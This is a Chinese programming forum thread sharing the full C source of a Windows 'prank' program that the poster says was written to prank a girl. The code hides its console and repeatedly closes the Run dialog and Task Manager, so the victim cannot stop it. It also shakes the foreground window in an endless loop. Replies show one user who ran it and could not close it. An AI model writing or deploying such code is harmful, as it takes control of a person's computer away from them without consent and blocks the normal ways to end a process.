| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 6683 人关注过本帖
标题:分享个整人的程序
只看楼主 加入收藏
无诲今生
Rank: 8Rank: 8
来 自:桂林理工大学
等 级:蝙蝠侠
威 望:2
帖 子:373
专家分:726
注 册:2009-5-11
结帖率:93.48%
收藏
已结贴  问题点数:20 回复次数:24 
分享个整人的程序
今天为了整一个MM而写的~^_^,程序比较简单,就用了几个API函数,下面写有部份注释~~~
效果就和QQ抖动窗口一样差不多,不过是前景窗口一直抖动。。。。。。。。
程序代码:
#include<windows.h>
#include<math.h>
#pragma comment( linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )//隐藏控制台窗口
DWORD WINAPI ThreadProc(
                        LPVOID lpParameter  
                        )
{
    HWND hw;
    while(1)//下面可以添加其他要杀掉过滤的操作
    {
        if(
            (hw=FindWindow(NULL,"运行"))//杀掉开始菜单的运行
            ||
            (hw=FindWindow(NULL,"Windows 任务管理器"))//杀掉任务管理器
            )
            SendMessage(hw,WM_CLOSE,0,0);
        //下面可以添加其他要杀掉过滤的操作
        Sleep(50);
    }
}

void ReMoveWin(HWND hwnd, int sleep, int r)
{
    RECT cr,c1;
    int w,h,i;
    GetWindowRect(hwnd,&cr);//获取前景窗口句柄
    c1=cr;
    w=c1.right-c1.left;
    h=c1.bottom-c1.top;
    for(i=1;i<=1080;i=i+8)
    {
       
        c1.left+=(int)(r*cos(i*3.14/180));
        c1.top+=(int)(r*sin(i*3.14/180));
        MoveWindow(hwnd,c1.left,c1.top,w,h,1);//移动窗口
        Sleep(sleep);
    }
    MoveWindow(hwnd,cr.left,cr.top,w,h,1);//移动窗口
}   
DWORD WINAPI ThreadProc1(
                        LPVOID lpParameter  
                        )
{
    while(1)
    {
        ReMoveWin(GetForegroundWindow(),4,2);
        Sleep(80);
    }
}
void main()
{
    HANDLE handle[2];
    handle[0]=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)ThreadProc,NULL,0,NULL);//创线程
    handle[1]=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)ThreadProc1,NULL,0,NULL);//创建线程
    MessageBox(NULL,"嘿嘿。。纯属娱乐!",NULL,0);
    WaitForMultipleObjects(2,handle,1,-1);//等待线程
}

搜索更多相关主题的帖子: 函数 
2011-08-21 22:12
wudihuanying
Rank: 1
等 级:新手上路
帖 子:21
专家分:5
注 册:2011-7-4
收藏
得分:1 
回复 楼主 无诲今生
代码好多不懂,比如线程任务管理器等,这些C书上都没见过,求教应该到哪里学,看什么书?
2011-08-21 23:26
xzy199999
Rank: 4
等 级:业余侠客
帖 子:326
专家分:286
注 册:2010-11-19
收藏
得分:1 
好深奥啊

我是初学者
2011-08-22 00:15
naruto01
Rank: 4
等 级:业余侠客
帖 子:103
专家分:280
注 册:2011-5-23
收藏
得分:1 
回复 2楼 wudihuanying
这些内容参看比如MSDN
2011-08-22 01:11
小偌
Rank: 4
来 自:成都
等 级:业余侠客
帖 子:170
专家分:241
注 册:2011-8-15
收藏
得分:1 
...mang茫然~

不是很好么..比起关在笼子里的可怜小鸟..我成为乌鸦已足矣
2011-08-22 03:06
hjywyj
Rank: 11Rank: 11Rank: 11Rank: 11
等 级:小飞侠
威 望:3
帖 子:1114
专家分:2611
注 册:2010-4-14
收藏
得分:1 
好深奥!
2011-08-22 07:23
魅惑极光
Rank: 1
等 级:新手上路
帖 子:15
专家分:1
注 册:2011-4-11
收藏
得分:1 
看不懂!!!!!?????
2011-08-22 08:27
kscooh1
Rank: 2
等 级:论坛游民
帖 子:53
专家分:25
注 册:2011-8-8
收藏
得分:1 
msdm有中文注释的吗,全英文,有点看不明白.
2011-08-22 08:35
kscooh1
Rank: 2
等 级:论坛游民
帖 子:53
专家分:25
注 册:2011-8-8
收藏
得分:0 
怎么变成小工具呀,我在电脑上运行了,怎么关闭.一直转.
2011-08-22 08:45
QQ346957135
Rank: 7Rank: 7Rank: 7
等 级:黑侠
帖 子:148
专家分:658
注 册:2011-8-9
收藏
得分:1 
谢谢分享

A real warrior never quits.
2011-08-22 09:19
快速回复:分享个整人的程序
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.023742 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved